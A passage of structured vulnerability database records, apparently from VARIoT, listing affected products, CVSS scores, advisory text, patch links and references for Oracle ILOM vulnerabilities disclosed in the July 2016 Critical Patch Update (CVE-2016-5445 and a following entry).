scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: 
"application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", 
version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, { db: "JVNDB", id: "JVNDB-2016-003873", }, { db: "CNNVD", id: "CNNVD-201607-809", }, { db: "NVD", id: "CVE-2016-5445", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003873", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, ], trust: 0.6, }, cve: "CVE-2016-5445", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "CVE-2016-5445", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 1.9, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "VHN-94264", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "LOW", baseScore: 8.3, baseSeverity: "HIGH", confidentialityImpact: "LOW", exploitabilityScore: 3.9, id: "CVE-2016-5445", impactScore: 3.7, integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-5445", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-5445", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201607-809", trust: 0.6, value: "HIGH", }, { author: "VULHUB", id: "VHN-94264", trust: 0.1, value: "HIGH", }, { author: "VULMON", id: "CVE-2016-5445", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: 
"VULHUB", id: "VHN-94264", }, { db: "VULMON", id: "CVE-2016-5445", }, { db: "JVNDB", id: "JVNDB-2016-003873", }, { db: "CNNVD", id: "CNNVD-201607-809", }, { db: "NVD", id: "CVE-2016-5445", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle 
Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. 
\nThe vulnerability can be exploited over the 'Multiple' protocol. The 'Authentication' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation", sources: [ { db: "NVD", id: "CVE-2016-5445", }, { db: "JVNDB", id: "JVNDB-2016-003873", }, { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, { db: "VULHUB", id: "VHN-94264", }, { db: "VULMON", id: "CVE-2016-5445", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-5445", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "91991", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003873", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-809", trust: 0.7, }, { db: "VULHUB", id: "VHN-94264", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-5445", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-94264", }, { db: "VULMON", id: "CVE-2016-5445", }, { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, { db: "JVNDB", id: "JVNDB-2016-003873", }, { db: "CNNVD", id: "CNNVD-201607-809", }, { db: "NVD", id: "CVE-2016-5445", }, ], }, id: "VAR-201607-0652", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-94264", }, ], trust: 0.01, }, last_update_date: "2024-11-23T20:49:10.256000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical 
Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63169", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-5445", }, { db: "JVNDB", id: "JVNDB-2016-003873", }, { db: "CNNVD", id: "CNNVD-201607-809", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-5445", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/91991", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5445", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5445", }, { trust: 0.3, 
url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-94264", }, { db: "VULMON", id: "CVE-2016-5445", }, { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, { db: "JVNDB", id: "JVNDB-2016-003873", }, { db: "CNNVD", id: "CNNVD-201607-809", }, { db: "NVD", id: "CVE-2016-5445", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-94264", }, { db: "VULMON", id: "CVE-2016-5445", }, { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, { db: "JVNDB", id: "JVNDB-2016-003873", }, { db: "CNNVD", id: "CNNVD-201607-809", }, { db: "NVD", id: "CVE-2016-5445", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-94264", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-5445", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91991", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003873", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-809", }, { date: "2016-07-21T10:14:59.303000", db: "NVD", id: "CVE-2016-5445", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", 
id: "VHN-94264", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-5445", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91991", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003873", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-809", }, { date: "2024-11-21T02:54:19.770000", db: "NVD", id: "CVE-2016-5445", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In Authentication Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003873", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91991", }, ], trust: 0.6, }, }
var-201607-0605
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote authenticated users to affect availability via vectors related to Web. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:
Oracle Application Express
Oracle Database Server
Oracle Access Manager
Oracle BI Publisher
Oracle Business Intelligence Enterprise Edition
Oracle Directory Server Enterprise Edition
Oracle Exalogic Infrastructure
Oracle Fusion Middleware
Oracle GlassFish Server
Oracle HTTP Server
Oracle JDeveloper
Oracle Portal
Oracle WebCenter Sites
Oracle WebLogic Server
Outside In Technology
Hyperion Financial Reporting
Enterprise Manager Base Platform
Enterprise Manager for Fusion Middleware
Enterprise Manager Ops Center
Oracle E-Business Suite
Oracle Agile Engineering Data Management
Oracle Agile PLM
Oracle Demand Planning
Oracle Engineering Data Management
Oracle Transportation Management
PeopleSoft Enterprise FSCM
PeopleSoft Enterprise PeopleTools
JD Edwards EnterpriseOne Tools
Siebel Applications
Oracle Fusion Applications
Oracle Communications ASAP
Oracle Communications Core Session Manager
Oracle Communications EAGLE Application Processor
Oracle Communications Messaging Server
Oracle Communications Network Charging and Control
Oracle Communications Operations Monitor
Oracle Communications Policy Management
Oracle Communications Session Border Controller
Oracle Communications Unified Session Manager
Oracle Enterprise Communications Broker
Oracle Banking Platform
Oracle Financial Services Lending and Leasing
Oracle FLEXCUBE Direct Banking
Oracle Health Sciences Clinical Development Center
Oracle Health Sciences Information Manager
Oracle Healthcare Analytics Data Integration
Oracle Healthcare Master Person Index
Oracle Documaker
Oracle Insurance Calculation Engine
Oracle Insurance Policy Administration J2EE
Oracle Insurance Rules Palette
MICROS Retail XBRi Loss Prevention
Oracle Retail Central
Oracle Back Office
Oracle Returns Management
Oracle Retail Integration Bus
Oracle Retail Order Broker
Oracle Retail Service Backbone
Oracle Retail Store Inventory Management
Oracle Utilities Framework
Oracle Utilities Network Management System
Oracle Utilities Work and Asset Management
Oracle In-Memory Policy Analytics
Oracle Policy Automation
Oracle Policy Automation Connector for Siebel
Oracle Policy Automation for Mobile Devices
Primavera Contract Management
Primavera P6 Enterprise Project Portfolio Management
Oracle Java SE
Oracle Java SE Embedded
Oracle JRockit
40G 10G 72/64 Ethernet Switch
Fujitsu M10-1 Servers
Fujitsu M10-4 Servers
Fujitsu M10-4S Servers
ILOM
Oracle Switch ES1-24
Solaris
Solaris Cluster
SPARC Enterprise M3000 Servers
SPARC Enterprise M4000 Servers
SPARC Enterprise M5000 Servers
SPARC Enterprise M8000 Servers
SPARC Enterprise M9000 Servers
Sun Blade 6000 Ethernet Switched NEM 24P 10GE
Sun Data Center InfiniBand Switch 36
Sun Network 10GE Switch 72p
Sun Network QDR InfiniBand Gateway Switch
Oracle Secure Global Desktop
Oracle VM VirtualBox
MySQL Server
Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. That sentence and the product list above describe the Critical Patch Update as a whole; for this entry, the affected component is ILOM and the stated impact is on availability. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'HTTP' protocol. The 'Web' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation. A remote attacker can exploit this vulnerability to cause a denial of service and affect data availability.
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0605", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", 
version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: 
"oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", 
